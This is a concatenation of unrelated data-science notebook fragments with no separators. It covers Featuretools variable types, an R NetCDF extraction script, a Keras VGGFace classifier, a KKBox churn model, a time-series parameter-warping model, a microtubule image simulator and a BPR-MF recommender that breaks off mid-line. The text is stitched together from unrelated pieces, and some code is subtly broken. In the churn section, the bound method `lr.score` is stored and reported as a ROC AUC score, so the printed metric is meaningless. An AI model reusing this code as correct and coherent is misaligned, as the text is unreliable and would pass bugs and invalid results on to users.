appropriate to use the ZIPCode variable type. DatetimeA Datetime is a representation of a date and/or time. Datetime variable types can be represented as strings or integers. However, they should be in an interpretable format or properly cast before using DFS. Some examples of Datetime include:- transaction time- flight departure time- pickup time DateOfBirthA more specific type of Datetime is DateOfBirth. This is an important distinction because it allows additional primitives to be applied to the data to generate new features. For example, having a DateOfBirth variable type will allow the Age primitive to be applied during DFS, leading to a new Numeric feature. TextText is a long-form string that can be of any length. It is commonly used with NLP operations, such as TF-IDF. Featuretools supports NLP operations with the nlp-primitives [add-on](https://innovation.alteryx.com/natural-language-processing-featuretools/). LatLongA LatLong represents an ordered pair (Latitude, Longitude) that specifies a location on Earth. The order of the tuple is important. LatLongs can be represented as a tuple of floating point numbers. 
To make a LatLong in a dataframe do the following:import pandas as pd data = pd.DataFrame() data['latitude'] = [51.52, 9.93, 37.38] data['longitude'] = [-0.17, 76.25, -122.08] data['latlong'] = data[['latitude', 'longitude']].apply(tuple, axis=1) data['latlong']List of Variable Types We can also get all the variable types as a DataFrame.from featuretools.variable_types import list_variable_types list_variable_types()This is a simple script that demonstrates how to open netcdf files (a typical format of file used for storing large amounts of data, and often used to display output from 3D Earth system models). This example uses a version of the marine reservoir ages output from Butzin et al. 2017.# load required packages library(ncdf4) library(maps) #Open netcdf file nc <- nc_open( "mra14_intcal13_pd_21kcalBP.nc") #list names of variables in netcdf file names(nc$var) #list names of dimensions in netcdf file names(nc$dim)Lets say that you want to extract the marine reservoir ages at a specific location for which you have the longitude, latitude and depth (e.g. -55oN, -70oE, 3000m). The following is the code for how to extract such data.#Lets have a look at the matrix containing the variable of interest. In this case marine reservoir ages ("MRA) nc_var <- ncvar_get( nc, varid="MRA" ) #list how many dimensions the matrix has dim(nc_var) #Note how this compares to the number of entries in each dimension length(nc$dim$lon$vals) length(nc$dim$lat$vals) length(nc$dim$depth$vals) #The matrix containing our variable is made up of the following [lon,lat,depth] #Lets try to extract the data for our core site #First define the variables input_lat = -55.1 input_lon = -70 input_depth = 1250 #Now find the location in the matrix that corresponds to our data. #It is likely that your core is not at the exact location as each data point in the cdf file, #so you will have to find the nearest grid point #Find correct colours for Interpolated_masterfile nc_lat<-nc$dim$lat$vals nc_lon<-nc$dim$lon$vals nc_depth<-nc$dim$depth$vals #This is written in a loop to make it easier when you have more than one site index_vals=NULL for(i in 1:length(input_lat)){ lat_index<-which(abs(nc_lat-input_lat[i])==min(abs(nc_lat-input_lat[i]))) #longitudes may need correcting from -180 to 180 ---> 0 to 360 input_lon2<-ifelse(input_lon[i]< min(nc$dim$lon$vals), input_lon[i]+360, input_lon[i]) lon_index<-which(abs(nc_lon-input_lon2)==min(abs(nc_lon-input_lon2))) depth_index<-which(abs(nc_depth-input_depth[i])==min(abs(nc_depth-input_depth[i]))) a<-data.frame(lat_index=lat_index,lon_index=lon_index,depth_index=depth_index) index_vals<-rbind(index_vals,a) } index_vals #Now use these index values to find the RMA at the core site by using the variable matrix MRA_output=NULL for(i in 1:nrow(index_vals)){ MRA<-nc_var[index_vals$lon_index[i],index_vals$lat_index[i],index_vals$depth_index[i]] MRA_output<-rbind(MRA_output,MRA) } MRA_outputThe same principle can be used to extract marine reservoir ages from multiple sites. You can import in an excel sheet containing all of your longitudes, latitudes and depths, and output the data as a csv file.#This package lets you read in excel docs require(gdata) input_cores<- read.xls("All_chilean_margin_cores.xlsx", sheet=1, header=TRUE) #See the top few lines of your excel file head(input_cores) #Define the input variables input_lat = input_cores$Lat..oN. input_lon = input_cores$Long..oE. input_depth = input_cores$WD..m. 
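#Note: the column names used above ("Lat..oN.", "Long..oE.", "WD..m.") are specific to this spreadsheet;
#read.xls converts headers such as "Lat (oN)" into syntactically valid R names, so check names(input_cores) and adjust these lines to match your own file.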
#Again apply the function to find the index locations of each site within the variable matrix index_vals=data.frame(lat_index=numeric(0),lon_index=numeric(0),depth_index=numeric(0)) for(i in 1:length(input_lat)){ lat_index<-which(abs(nc_lat-input_lat[i])==min(abs(nc_lat-input_lat[i]))) #longitudes may need correcting from -180 to 180 ---> 0 to 360 input_lon2<-ifelse(input_lon[i]< min(nc$dim$lon$vals), input_lon[i]+360, input_lon[i]) lon_index<-which(abs(nc_lon-input_lon2)==min(abs(nc_lon-input_lon2))) depth_index<-which(abs(nc_depth-input_depth[i])==min(abs(nc_depth-input_depth[i]))) a <- data.frame(lat_index=lat_index,lon_index=lon_index,depth_index=depth_index) index_vals<-rbind(index_vals,a) } #Now use these index values to find the RMA at the core site by using the variable matrix MRA_output=NULL for(i in 1:nrow(index_vals)){ MRA<-nc_var[index_vals$lon_ind[i],index_vals$lat_ind[i],index_vals$depth_ind[i]] MRA_output<-rbind(MRA_output,MRA) } #Add the output to the original datafile input_cores["MRA"]<- MRA_output #Display datafile input_cores #Output as csv file write.csv(input_cores,"input_cores_with MRA.csv")In this notebook:- Using a pre-trained convnet to do feature extraction - Use ConvBase only for feature extraction, and use a separate machine learning classifier - Adding ```Dense``` layers to top of a frozen ConvBase, allowing us to leverage data augmentation - Fine-tuning a pre-trained convnet (Skipped, because I am tired now) In previous notebook: - Training your own small convnets from scratch- Using data augmentation to mitigate overfittingfrom datetime import date date.today() author = "NirantK. https://github.com/NirantK/keras-practice" print(author) import keras print('Keras Version:', keras.__version__) import os if os.name=='nt': print('We are on Windows') import os, shutil pwd = os.getcwd() print(pwd)/home/nirant/keras-practiceFeature extraction---This consists of using the representations learned by a previous network to extract interesting features from new samples. These features are then run through a new classifier, which is trained from scratch.![](https://dpzbhybb2pdcj.cloudfront.net/chollet/v-6/Figures/swapping_fc_classifier.png) **Warning: The line below triggers a download. 
You need good speed Internet!**# !wget http://www.robots.ox.ac.uk/~vgg/software/vgg_face/src/vgg_face_matconvnet.tar.gz # if you get CUDA_ERROR_OUT_OF_MEMORY, uncomment below, run and restart the notebook # !sudo nvidia-modprobe -u -c=0 # !pip install keras_vggfaceFeature Extraction---Pros: - Fast, and cheap- Works on CPUCons: - Does not allow us to use data augmentation - Because we do feature extraction and classification in separate stepsimport os import numpy as np from keras.preprocessing.image import ImageDataGenerator base_dir = os.path.join(pwd, 'data/ladies') train_dir = os.path.join(base_dir, 'train') validation_dir = os.path.join(base_dir, 'validation') test_dir = os.path.join(base_dir, 'test') from keras.engine import Model from keras.layers import Input from keras_vggface.vggface import VGGFace # Convolution Features vgg_features = VGGFace(include_top=False, input_shape=(150, 150, 3), pooling='max') vgg_features.summary() datagen = ImageDataGenerator(rescale=1./255) batch_size = 1 def extract_features(directory, sample_count): features = np.zeros(shape=(sample_count, 4, 4, 512)) labels = np.zeros(shape=(sample_count)) generator = datagen.flow_from_directory( directory, target_size=(150, 150), batch_size=batch_size, class_mode='binary') i = 0 for inputs_batch, labels_batch in generator: features_batch = vgg_features.predict(inputs_batch) features[i * batch_size : (i + 1) * batch_size] = features_batch labels[i * batch_size : (i + 1) * batch_size] = labels_batch i += 1 if i * batch_size >= sample_count: # Note that since generators yield data indefinitely in a loop, # we must `break` after every image has been seen once. break return features, labels %time train_features, train_labels = extract_features(train_dir, 801) %time validation_features, validation_labels = extract_features(validation_dir, 1000) %time test_features, test_labels = extract_features(test_dir, 1000) vgg_features.summary() train_features = np.reshape(train_features, (801, 4 * 4 * 512)) validation_features = np.reshape(validation_features, (1000, 4 * 4 * 512)) test_features = np.reshape(test_features, (1000, 4 * 4 * 512)) from keras import models from keras import layers from keras import optimizers model = models.Sequential() model.add(layers.Dense(256, activation='relu', input_dim=4 * 4 * 512)) model.add(layers.Dropout(0.5)) model.add(layers.Dense(1, activation='sigmoid')) model.compile(optimizer=optimizers.RMSprop(lr=2e-5), loss='binary_crossentropy', metrics=['acc']) %time history = model.fit(train_features, train_labels, epochs=30, batch_size=20, \ validation_data=(validation_features, validation_labels)) model.save('emma_faces_feature_extraction.h5') import matplotlib.pyplot as plt acc = history.history['acc'] val_acc = history.history['val_acc'] loss = history.history['loss'] val_loss = history.history['val_loss'] epochs = range(1, len(acc) + 1) plt.plot(epochs, acc, 'bo', label='Training acc') plt.plot(epochs, val_acc, 'b', label='Validation acc') plt.title('Training and validation accuracy') plt.legend() plt.figure() plt.plot(epochs, loss, 'bo', label='Training loss') plt.plot(epochs, val_loss, 'b', label='Validation loss') plt.title('Training and validation loss') plt.legend() plt.show()Extending the ConvBase Model!---Pros: - Better performance (accuracy)- Better Generalization (less overfitting) - Because we can use data augmentation Cons:- Expensive compute**Warning: Do not attempt this without a GPU. 
Your Python process can/will crash after a few hours**from keras import models from keras import layers model = models.Sequential() model.add(vgg_features) # model.add(layers.Flatten()) model.add(layers.Dense(256, activation='relu')) model.add(layers.Dense(1, activation='sigmoid')) model.summary()_________________________________________________________________ Layer (type) Output Shape Param # ================================================================= vggface_vgg16 (Model) (None, 512) 14714688 _________________________________________________________________ dense_3 (Dense) (None, 256) 131328 _________________________________________________________________ dense_4 (Dense) (None, 1) 257 ================================================================= Total params: 14,846,273 Trainable params: 14,846,273 Non-trainable params: 0 _________________________________________________________________Freezing ConvBase model: VGG16Freezing means we do not update the layer weights in those particular layers. This is important for our present application.print('This is the number of trainable weights ' 'before freezing the base:', len(model.trainable_weights)) vgg_features.trainable = False print('This is the number of trainable weights ' 'after freezing the base:', len(model.trainable_weights)) model.summary() # compare the Trainable Params value from the previous model summary from keras.preprocessing.image import ImageDataGenerator train_datagen = ImageDataGenerator( rescale=1./255, rotation_range=40, width_shift_range=0.2, height_shift_range=0.2, shear_range=0.2, zoom_range=0.2, horizontal_flip=True, fill_mode='nearest') # Note that the validation data should not be augmented! test_datagen = ImageDataGenerator(rescale=1./255) train_generator = train_datagen.flow_from_directory( # This is the target directory train_dir, # All images will be resized to 150x150 target_size=(150, 150), batch_size=20, # Since we use binary_crossentropy loss, we need binary labels class_mode='binary') validation_generator = test_datagen.flow_from_directory( validation_dir, target_size=(150, 150), batch_size=20, class_mode='binary') model.compile(loss='binary_crossentropy', optimizer=optimizers.RMSprop(lr=2e-5), metrics=['acc']) history = model.fit_generator( train_generator, steps_per_epoch=100, epochs=10, validation_data=validation_generator, validation_steps=50) acc = history.history['acc'] val_acc = history.history['val_acc'] loss = history.history['loss'] val_loss = history.history['val_loss'] epochs = range(1, len(acc) + 1) plt.plot(epochs, acc, 'bo', label='Training acc') plt.plot(epochs, val_acc, 'b', label='Validation acc') plt.title('Training and validation accuracy') plt.legend() plt.figure() plt.plot(epochs, loss, 'bo', label='Training loss') plt.plot(epochs, val_loss, 'b', label='Validation loss') plt.title('Training and validation loss') plt.legend() plt.show() # just for reference, let's calculate the test accuracy test_generator = test_datagen.flow_from_directory( test_dir, target_size=(150, 150), batch_size=20, class_mode='binary') %time test_loss, test_acc = model.evaluate_generator(test_generator, steps=50) print('test acc:', test_acc)Found 200 images belonging to 2 classes. 
CPU times: user 3.28 s, sys: 316 ms, total: 3.59 s Wall time: 2.61 s test acc: 0.874999992847WSDM - KKBox's Churn Prediction Challenge Import libraryimport pandas as pd import numpy as np import seaborn as sns import matplotlib.pyplot as plt from sklearn.linear_model import LogisticRegression from sklearn.model_selection import StratifiedKFold,RandomizedSearchCV from sklearn.metrics import roc_auc_score,confusion_matrix,roc_curve from sklearn.preprocessing import LabelEncoder from sklearn.feature_extraction.text import TfidfVectorizer import datetime as dt % matplotlib inline seed = 129Import Dataset#path = '../input/' path = 'dataset/' nrows =100000 #nrows =None train = pd.read_csv(path+'train_v2.csv',nrows=nrows, dtype={'is_churn':np.int8}) test = pd.read_csv(path+'sample_submission_v2.csv',nrows=nrows,dtype={'is_churn':np.int8}) members = pd.read_csv(path+'members_v3.csv',nrows=nrows,parse_dates=['registration_init_time'],dtype={'city':np.int8,'bd':np.int8, 'registered_via':np.int8}) transactions = pd.read_csv(path+'transactions_v2.csv',nrows=nrows,parse_dates=['transaction_date','membership_expire_date'], dtype={'payment_method_id':np.int8,'payment_plan_days':np.int8,'plan_list_price':np.int8, 'actual_amount_paid':np.int8,'is_auto_renew':np.int8,'is_cancel':np.int8}) user_log = pd.read_csv(path+'user_logs_v2.csv',nrows=nrows,parse_dates=['date'],dtype={'num_25':np.int16,'num_50':np.int16, 'num_75':np.int16,'num_985':np.int16,'num_100':np.int16,'num_unq':np.int16})Explore data setprint('Number of rows & columns',train.shape) train.head() print('Number of rows & columns',test.shape) test.head() print('Number of rows & columns',members.shape) members.head() print('Number of rows & columns',transactions.shape) transactions.head() print('Number of rows & columns',user_log.shape) user_log.head() print('\nTrain:',train.describe().T) print('\nTest:',test.describe().T) print('\nMembers:',members.describe().T) print('\nTransactions:',transactions.describe().T) print('\nUser log:',user_log.describe().T)Train: count mean std min 25% 50% 75% max is_churn 100000.0 0.5233 0.499459 0.0 0.0 1.0 1.0 1.0 Test: count mean std min 25% 50% 75% max is_churn 100000.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 Members: count mean std min 25% 50% 75% max city 100000.0 4.21193 5.721570 1.0 1.0 1.0 5.0 22.0 bd 100000.0 10.80096 15.853796 -101.0 0.0 0.0 23.0 117.0 registered_via 100000.0 5.47079 2.462512 2.0 4.0 4.0 9.0 19.0 Transactions: count mean std min 25% 50% 75% \ payment_method_id 100000.0 37.91340 4.956516 3.0 36.0 40.0 41.0 payment_plan_days 100000.0 18.44352 39.797074 -117.0 30.0 30.0 30.0 plan_list_price 100000.0 -21.83432 94.701296 -127.0 -107.0 -76.0 99.0 actual_amount_paid 100000.0 -21.04312 94.849653 -127.0 -107.0 -76.0 99.0 is_auto_renew 100000.[...]Merge data settrain = pd.merge(train,members,on='msno',how='left') test = pd.merge(test,members,on='msno',how='left') train = pd.merge(train,transactions,how='left',on='msno',left_index=True, right_index=True) test = pd.merge(test,transactions,how='left',on='msno',left_index=True, right_index=True,) train = pd.merge(train,user_log,how='left',on='msno',left_index=True, right_index=True) test = pd.merge(test,user_log,how='left',on='msno',left_index=True, right_index=True) del members,transactions,user_log print('Number of rows & columns',train.shape) print('Number of rows & columns',test.shape)Number of rows & columns (100000, 23) Number of rows & columns (100000, 23)Date featuretrain[['registration_init_time' 
,'transaction_date','membership_expire_date','date']].describe() train[['registration_init_time' ,'transaction_date','membership_expire_date','date']].isnull().sum() train['registration_init_time'] = train['registration_init_time'].fillna(value=pd.to_datetime('09/10/2015')) test['registration_init_time'] = test['registration_init_time'].fillna(value=pd.to_datetime('09/10/2015')) def date_feature(df): col = ['registration_init_time' ,'transaction_date','membership_expire_date','date'] var = ['reg','trans','mem_exp','user_'] #df['duration'] = (df[col[1]] - df[col[0]]).dt.days for i ,j in zip(col,var): df[j+'_day'] = df[i].dt.day.astype('uint8') df[j+'_weekday'] = df[i].dt.weekday.astype('uint8') df[j+'_month'] = df[i].dt.month.astype('uint8') df[j+'_year'] =df[i].dt.year.astype('uint16') date_feature(train) date_feature(test)Data analysistrain.columnsMissing valuedef basic_details(df): k = pd.DataFrame() k['N unique values'] = df.nunique() k['Misssing value'] = df.isnull().sum() k['dtype'] = df.dtypes return k basic_details(train) col = [ 'city', 'bd', 'gender', 'registered_via'] def missing(df,columns): col = columns for i in col: df[i].fillna(df[i].mode()[0],inplace=True) missing(train,col) missing(test,col)is_churnplt.figure(figsize=(8,6)) sns.set_style('ticks') sns.countplot(train['is_churn'],palette='summer') plt.xlabel('The subscription within 30 days of expiration is True/False')Imbalanced data setmsno: user idis_churn: This is the target variable. Churn is defined as whether the user did not continue the subscription within 30 days of expiration. is_churn = 1 means churn,is_churn = 0 means renewal. Univariate analysisprint(train['city'].unique()) fig,ax = plt.subplots(2,2,figsize=(16,8)) ax1,ax2,ax3,ax4 = ax.flatten() sns.set(style="ticks") sns.countplot(train['city'],palette='summer',ax=ax1) #ax1.set_yscale('log') ax1.set_xlabel('City') #ax1.set_xticks(rotation=45) sns.countplot(x='gender',data = train,palette='winter',ax=ax2) #ax2.set_yscale('log') ax2.set_xlabel('Gender') sns.countplot(x='registered_via',data=train,palette='winter',ax=ax3) #ax3.set_yscale('') ax3.set_xlabel('Register via') sns.countplot(x='payment_method_id',data= train,palette='winter',ax=ax4) ax4.set_xlabel('Payment_method_id')[ 1. 13. 21. 4. 6. 5. 22. 15. 12. 10. 9. 14. 16. 8. 17. 11. 18. 3. 7. 
20.]bd (birth day)print(train['bd'].describe()) fig,ax = plt.subplots(1,2,figsize=(16,8)) ax1,ax2 = ax.flatten() sns.set_style('ticks') sns.distplot(train['bd'].fillna(train['bd'].mode()[0]),bins=100,color='r',ax=ax1) plt.title('Distribution of birth day') plt.figure(figsize=(14,6)) sns.distplot(train.loc[train['bd'].value_counts()]['bd'].fillna(0),bins=50,color='b')/home/sudhir/anaconda3/lib/python3.6/site-packages/statsmodels/nonparametric/kde.py:488: RuntimeWarning: invalid value encountered in true_divide binned = fast_linbin(X, a, b, gridsize) / (delta * nobs) /home/sudhir/anaconda3/lib/python3.6/site-packages/statsmodels/nonparametric/kdetools.py:34: RuntimeWarning: invalid value encountered in double_scalars FAC1 = 2*(np.pi*bw/RANGE)**2Genderprint(pd.crosstab(train['is_churn'],train['gender']))gender female male is_churn 0 166 47504 1 256 52074registration_init_timeregi = train.groupby('registration_init_time').count()['is_churn'] plt.subplot(211) plt.plot(regi,color='b',label='count') plt.legend(loc='center') regi = train.groupby('registration_init_time').mean()['is_churn'] plt.subplot(212) plt.plot(regi,color='r',label='mean') plt.legend(loc='center') plt.tight_layout() regi = train.groupby('registration_init_time').mean()['is_churn'] plt.figure(figsize=(14,6)) sns.distplot(regi,bins=100,color='r')registrationfig,ax = plt.subplots(2,2,figsize=(16,8)) ax1,ax2,ax3,ax4 = ax.flatten() sns.countplot(train['reg_day'],palette='Set2',ax=ax1) sns.countplot(data=train,x='reg_month',palette='Set1',ax=ax2) sns.countplot(data=train,x='reg_year',palette='magma',ax=ax3) cor = train.corr() plt.figure(figsize=(16,12)) sns.heatmap(cor,cmap='binary',annot=False) plt.xticks(rotation=45)Encoderle = LabelEncoder() train['gender'] = le.fit_transform(train['gender']) test['gender'] = le.fit_transform(test['gender'])One Hot Encodingtest.head() def OHE(df1,df2): #col = df.select_dtypes(include=['category']).columns col = ['city','gender','registered_via'] print('Categorical columns in dataset',col) len_df1 = df1.shape[0] df = pd.concat([df1,df2],ignore_index=True) c2,c3 = [],{} for c in col: if df[c].nunique()>2 : c2.append(c) c3[c] = 'ohe_'+c df = pd.get_dummies(df,columns=c2,drop_first=True,prefix=c3) df1 = df.loc[:len_df1] df2 = df.loc[len_df1:] print(df1.shape,df2.shape) return df1,df2 train1, test1 = OHE(train,test)Categorical columns in dataset ['city', 'gender', 'registered_via'] (100001, 61) (100000, 61)Split data setunwanted = ['msno','is_churn','registration_init_time','transaction_date','membership_expire_date','date'] X = train1.drop(unwanted,axis=1) y = train1['is_churn'].astype('category') x_test = test1.drop(unwanted,axis=1)Hyper parameter tuninglog_reg = LogisticRegression(class_weight='balanced') param = {'C':[0.001,0.005,0.01,0.05,0.1,0.5,1,1.5,2,3]} rs_cv = RandomizedSearchCV(estimator=log_reg,param_distributions=param,random_state=seed) rs_cv.fit(X,y) print('Best parameter :{} Best score :{}'.format(rs_cv.best_params_,rs_cv.best_score_))Best parameter :{'C': 2} Best score :0.5073449265507345Logistic regression model with Stratified KFold splitkf = StratifiedKFold(n_splits=5,shuffle=True,random_state=seed) pred_test_full =0 cv_score =[] i=1 for train_index,test_index in kf.split(X,y): print('{} of KFold {}'.format(i,kf.n_splits)) xtr,xvl = X.loc[train_index],X.loc[test_index] ytr,yvl = y.loc[train_index],y.loc[test_index] #model lr = LogisticRegression(C=1) lr.fit(xtr,ytr) score = lr.score print('ROC AUC score:',score) cv_score.append(score) pred_test = lr.predict_proba(x_test)[:,1] 
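# Note: `score = lr.score` above stores the estimator's bound method rather than a metric value, so the printed 'ROC AUC score' and the entries appended to cv_score are not numbers; presumably something like roc_auc_score(yvl, lr.predict_proba(xvl)[:, 1]) was intended.
# The test-set predictions from each fold are accumulated in pred_test_full and averaged over kf.n_splits after the loop (y_pred = pred_test_full/kf.n_splits).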
pred_test_full +=pred_test i+=1 #lr.fit(X,y) #lr.score(X,y) #y_pred = lr.predict_proba(x_test)[:,1]Model validationprint(cv_score) print('\nMean accuracy',np.mean(cv_score)) confusion_matrix(yvl,lr.predict(xvl))[, , , Reciever Operating Charactaristicsy_proba = lr.predict_proba(X)[:,1] fpr,tpr,th = roc_curve(y,y_proba) plt.figure(figsize=(14,6)) plt.plot(fpr,tpr,color='r') plt.plot([0,1],[0,1],color='b') plt.title('Reciever operating Charactaristics') plt.xlabel('False positive rate') plt.ylabel('True positive rate')Predict for unseen data sety_pred = pred_test_full/kf.n_splits submit = pd.DataFrame({'msno':test['msno'],'is_churn':y_pred}) submit.to_csv('kk_pred.csv',index=False) #submit.to_csv('kk_pred.csv.gz',index=False,compression='gzip') submit.head()Define modelN, T, Din = x_train.shape _, Dout = y_train1hot.shape K = 6 Dhidden = 8 # hidden dimension # softmax regression with cross entropy loss (softmax performed in loss function) glm = nwarp.GeneralizedLinearModel(Dout, invlink_func=nn.Identity()) # TSP-based parameter warping with constant mode vector Dparamg = 0 # number of global parameters (same in every segment) Dparaml = Dhidden*Dout # number of local parameters (different in every segment) paramwarp = nwarp.ParameterWarp(K, Dparamg, Dparaml, nwarp.TSPStepWarp(nwarp.Constant((K-1,)), width=0.125, power=16., min_step=0.0001, max_step=0.9999)) # feature transformation for the covariates # map shape (T, Din) to shape (T, Dhidden) covariates = nn.Sequential( nn.Linear(Din, Dhidden), nn.ReLU(), ) print(covariates) print(paramwarp) print(glm) #glm(covariates(x_train), paramwarp(x_train)[0])Sequential( (0): Linear(in_features=33, out_features=8, bias=True) (1): ReLU() ) ParameterWarp( (warp): TSPStepWarp( (loc_net): Constant() ) (resample): Resample() ) GeneralizedLinearModel( (invlink_func): Identity() )Trainingn_restarts = 10 # number of randomized restarts n_epochs = 300 # total number of epochs n_epochs_hard = 100 # use hard segmentation for the last X epochs show_plots = True loss_fn = nn.CrossEntropyLoss(reduction='mean') best_loss = np.inf for r in range(n_restarts): # reset everything optimizer = torch.optim.Adam([ {'params': paramwarp.parameters(), 'lr': 1e-1}, {'params': covariates.parameters(), 'lr': 1e-1} ], weight_decay=0.0) param_norm = [] grad_norm = [] train_losses = [] resample_kernel = 'linear' epoch_counter = tqdm.tqdm(range(n_epochs), desc=f'restart {(r+1):2d}/{n_restarts:2d}') # initialize parameters _ = covariates.apply(nwarp.reset_parameters) _ = paramwarp.apply(nwarp.reset_parameters) nn.init.uniform_(paramwarp.warp.loc_net.const, -1., 0.) 
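# Descriptive note on the training loop below: each restart re-initializes the covariate network and the warp parameters, trains with a soft ('linear') resampling kernel, and switches to a hard ('integer') kernel for the final n_epochs_hard epochs; the covariates/paramwarp state with the lowest training loss seen across all restarts is kept and reloaded once the restarts finish.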
# segmentation # perform training paramwarp.train() covariates.train() for epoch in epoch_counter: optimizer.zero_grad() if epoch == n_epochs - n_epochs_hard: resample_kernel = 'integer' param_hat_train = paramwarp(x_train, # input is ignored, but must have shape (N, T, Din) resample_kernel=resample_kernel)[0] y_hat_train = glm(covariates(x_train), param_hat_train) loss = loss_fn(y_hat_train.squeeze(), y_train) loss.backward() optimizer.step() train_losses.append(loss.item()) param_norm.append([sl.norm(p.detach()) for p in paramwarp.parameters() if len(p)>0]) grad_norm.append([sl.norm(p.grad.detach()) for p in paramwarp.parameters() if len(p)>0]) epoch_counter.set_postfix({'max': f'{max(train_losses):.4f}', 'cur': f'{loss.item():.4f}'}) if train_losses[-1] < best_loss: best_paramwarp_state = deepcopy(paramwarp.state_dict()) best_covariates_state = deepcopy(covariates.state_dict()) best_loss = train_losses[-1] if show_plots: plt.figure(figsize=(15,2)) plt.subplot(131) plt.title('loss') plt.ylim(np.min(train_losses), np.percentile(train_losses, 95)) plt.plot(train_losses) plt.subplot(132) plt.title('parameter norm') lines = plt.plot(np.array(param_norm)/np.array(param_norm).max(axis=0)) plt.legend(lines, [' x '.join([str(d) for d in p.size()]) for p in paramwarp.parameters() if len(p)>0]) plt.subplot(133) plt.title('gradient norm') normalized_grad_norm = np.array(grad_norm)/np.array(grad_norm).max(axis=0) lines = plt.plot(normalized_grad_norm) plt.legend(lines, [' x '.join([str(d) for d in p.size()]) for p in paramwarp.parameters() if len(p)>0]) plt.ylim(np.min(normalized_grad_norm), np.percentile(normalized_grad_norm, 95)) plt.show() paramwarp.eval() covariates.eval() paramwarp.load_state_dict(best_paramwarp_state) covariates.load_state_dict(best_covariates_state) print(f'best loss = {best_loss:.4f}') param_hat_train, almat_hat_train, gamma_hat_train = paramwarp(x_train, # input is ignored, but must have shape (N, T, Din) resample_kernel=resample_kernel) y_hat_train = glm(covariates(x_train), param_hat_train) print(dataset) print(f'{K:2.0f}', f'{torch.sum(y_hat_train.argmax(-1) == y_train).item()/T:.2f}', end=' ') print() print('cps =', end=' ') for cp in almat_hat_train.sum(dim=1).cumsum(dim=1).squeeze()[:-1]: print(f'{cp.item():.0f}', end=' ') print()INSECTS-abrupt_balanced 6 0.74 cps = 12748 18068 28104 38266 46879Field of View SimulatorShow how to a microscope field of view with many microtubules.%load_ext autoreload %autoreload 2 %matplotlib inline from pathlib import Path import sys sys.path.append("../") import anamic import numpy as np import matplotlib.pyplot as plt # Common Parameters pixel_size = 110 # nm/pixel image_size_pixel = 512 # Per image parameters image_parameters = {} image_parameters['n_mt'] = {} image_parameters['n_mt']['values'] = np.arange(80, 120) image_parameters['n_mt']['prob'] = 'uniform' image_parameters['signal_mean'] = {} image_parameters['signal_mean']['values'] = {'loc': 700, 'scale': 10} image_parameters['signal_mean']['prob'] = 'normal' image_parameters['signal_std'] = {} image_parameters['signal_std']['values'] = {'loc': 100, 'scale': 1} image_parameters['signal_std']['prob'] = 'normal' image_parameters['bg_mean'] = {} image_parameters['bg_mean']['values'] = {'loc': 500, 'scale': 10} image_parameters['bg_mean']['prob'] = 'normal' image_parameters['bg_std'] = {} image_parameters['bg_std']['values'] = {'loc': 24, 'scale': 1} image_parameters['bg_std']['prob'] = 'normal' image_parameters['noise_factor'] = {} image_parameters['noise_factor']['values'] = 
{'loc': 1, 'scale': 0.1} image_parameters['noise_factor']['prob'] = 'normal' image_parameters['noise_factor']['values'] = [0.5] image_parameters['noise_factor']['prob'] = [1] image_parameters['mask_line_width'] = 4 # pixel image_parameters['mask_backend'] = 'skimage' # Per microtubule parameters. microtubule_parameters = {} microtubule_parameters['n_pf'] = {} microtubule_parameters['n_pf']['values'] = [11, 12, 13, 14, 15] microtubule_parameters['n_pf']['prob'] = [0.05, 0.05, 0.3, 0.1, 0.5] microtubule_parameters['mt_length_nm'] = {} microtubule_parameters['mt_length_nm']['values'] = np.arange(500, 10000) microtubule_parameters['mt_length_nm']['prob'] = 'uniform' microtubule_parameters['taper_length_nm'] = {} microtubule_parameters['taper_length_nm']['values'] = np.arange(0, 1000) microtubule_parameters['taper_length_nm']['prob'] = 'uniform' microtubule_parameters['labeling_ratio'] = {} microtubule_parameters['labeling_ratio']['values'] = [0.08, 0.09, 0.10, 0.11, 0.12, 0.13] microtubule_parameters['labeling_ratio']['prob'] = 'uniform' microtubule_parameters['pixel_size'] = pixel_size # nm/pixel microtubule_parameters['x_offset'] = 2000 # nm microtubule_parameters['y_offset'] = 2000 # nm microtubule_parameters['psf_size'] = 135 # nm image, masks, mts = anamic.simulator.create_fov(image_size_pixel, pixel_size, microtubule_parameters, image_parameters, return_positions=True) fig, axs = plt.subplots(ncols=2, figsize=(12, 6)) im = axs[0].imshow(image) #fig.colorbar(im, ax=axs[0]) axs[1].imshow(masks.max(axis=0))BPR-MF modelimport numpy as np import pandas as pd from collections import defaultdict import matplotlib.pyplot as plt from datetime import datetime from tqdm.notebook import tqdm import warnings, random warnings.filterwarnings('ignore') !wget -q --show-progress https://github.com/sparsh-ai/stanza/raw/S629908/rec/CDL/data/ml_100k_train.npy # data loading train = np.load('ml_100k_train.npy') train.shape train = np.array(train > 0, dtype=float) class Config: learning_rate = 0.01/2 weight_decay = 0.1/2 early_stopping_round = 0 epochs = 50 seed = 1995 dim_f = 20 alpha = 100 bootstrap_proportion = 0.5 config = Config() def item_per_user_dict(data): item_per_user = defaultdict(list) user_pos = np.nonzero(data != 0)[0] item_pos = np.nonzero(data != 0)[1] for u, i in zip(user_pos, item_pos): item_per_user[u].append(i) return item_per_user class BPR_MF: def __init__(self, data): self.data = data self.user_num = data.shape[0] self.item_num = data.shape[1] self.user_pos = data.nonzero()[0] self.item_pos = data.nonzero()[1] self.train_hist = defaultdict(list) self.valid_hist = defaultdict(list) self.W = np.random.standard_normal((self.user_num, config.dim_f)) self.H = np.random.standard_normal((self.item_num, config.dim_f)) def sampling_uij(self, item_per_user): u = np.random.choice(self.user_num) rated_items = item_per_user[u] i = np.random.choice(rated_items) j = np.random.choice(self.item_num) return u, i, j, rated_items def fit(self): train_per_user, test_per_user = self.train_test_split(self.data) n = len(self.user_pos) for epoch in range(config.epochs): preds = [] num_update_per_epoch = 0 while num_update_per_epoch <= n*config.bootstrap_proportion: u, i, j, rated_items = self.sampling_uij(train_per_user) if j not in rated_items: xuij = self.gradient_descent(u, i, j) num_update_per_epoch += 1 preds.append(xuij) auc = np.where(np.array(preds) > 0, 1, 0).mean() auc_vl = self.evaluate(train_per_user, test_per_user) self.train_hist[epoch] = auc; self.valid_hist[epoch] = auc_vl if epoch == 0 or 
